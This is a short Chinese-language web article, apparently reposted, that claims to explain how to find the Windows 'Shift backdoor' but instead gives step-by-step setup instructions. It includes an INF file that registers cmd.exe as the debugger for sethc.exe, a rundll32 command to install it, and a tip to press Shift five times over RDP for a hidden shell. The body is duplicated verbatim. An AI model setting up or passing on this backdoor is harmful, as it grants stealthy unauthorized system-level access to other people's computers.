SHIFT后门如何工作 ? 学习如何查找SHIFT后门?
时间:2024年05月11日
/来源:网络
/编辑:佚名
分析SHIFT后门的运行原理,学习如何查找SHIFT后门。
前几天逛了几个网站,之前下载的源码站一般不留后门,其实基本发现了都被删除了,这次发现一个源码里面包含一个shift后门,给你介绍shit后门工作原理!
将下面的代码保存成inf文件
[Version] Signature="$WINDOWS NT$" [DefaultInstall] AddReg=My_AddReg_Name [My_AddReg_Name] HKLM,SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution options\\sethc.exe,debugger,0x00000000,c:\\windows\\system32\\cmd.exe
然后上传到一个可以执行目录,比如我这里上传到c:\\windows\\temp\\i.inf
然后在命令行执行
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\\windows\\temp\\i.inf
然后远程登录3389,按5下shift即可跳出cmd.exe 为什么要命令行?很隐蔽。
前几天逛了几个网站,之前下载的源码站一般不留后门,其实基本发现了都被删除了,这次发现一个源码里面包含一个shift后门,给你介绍shit后门工作原理!
将下面的代码保存成inf文件
[Version] Signature="$WINDOWS NT$" [DefaultInstall] AddReg=My_AddReg_Name [My_AddReg_Name] HKLM,SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution options\\sethc.exe,debugger,0x00000000,c:\\windows\\system32\\cmd.exe
然后上传到一个可以执行目录,比如我这里上传到c:\\windows\\temp\\i.inf
然后在命令行执行
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\\windows\\temp\\i.inf
然后远程登录3389,按5下shift即可跳出cmd.exe 为什么要命令行?很隐蔽。
新闻资讯 更多